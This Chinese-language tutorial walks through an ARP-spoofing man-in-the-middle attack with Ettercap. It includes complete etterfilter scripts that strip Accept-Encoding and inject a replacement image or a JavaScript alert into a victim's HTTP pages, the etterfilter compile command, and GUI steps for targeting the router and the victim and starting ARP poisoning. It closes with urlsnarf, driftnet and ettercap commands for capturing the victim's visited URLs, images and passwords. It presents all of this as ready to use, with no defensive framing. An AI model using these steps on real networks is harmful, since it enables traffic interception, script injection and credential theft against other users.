Ettercap中间人攻击

利用 Ettercap0.8.4 图形化工具,ARP欺骗,替换图片。获取密码。获取访问的网址。

编写攻击脚本

替换内容
replace(“xxxx”, “xxxx”)

替换http中的图片

比如换了百度的logo,但这并没有好大意义。
例子如下:

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=https://pic.rmb.bdstatic.com/c86255e8028696139d3e3e4bb44c047b.png");
replace("IMG SRC=", "img src=https://pic.rmb.bdstatic.com/c86255e8028696139d3e3e4bb44c047b.png");
msg("替换图片成功!\n");
}

弹个窗跟打个招呼

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<head>", "<head><script type='text/javascript'>alert('嘿!朋友');</script>");
replace("<HEAD>", "<HEAD><script type='text/javascript'>alert('嘿!朋友');</script>");
msg("替换弹窗成功!\n");
}

然后另存为alert.filter文件

将alert.filter转变为二进制文件

etterfilter alert.filter -o alert.ef

利用ettercap进行中间人攻击

ettercap
选择网卡 确定(Accept)

打开 Host List并扫描

界面

添加为 Target

菜单 -> Target -> Current targets

  • 路由器自身添加为 Target1
  • 目标添加为 Target2
    Target

载入刚才生成的脚本

菜单 -> Filters -> Load a filter...
选择刚刚生成的二进制文件 点击 ok

开始arp欺骗

MITM 菜单 -> ARP poisoning... -> OK
开始中间人攻击

其他的攻击

获取目标的网址,图片,账号密码。

获取目标机访问的图片

命令行

urlsnarf -i wlan0

获取目标机访问的图片

命令行

driftnet -i wlan0

获取目标机账号密码

命令行

ettercap -Tq -i wlan0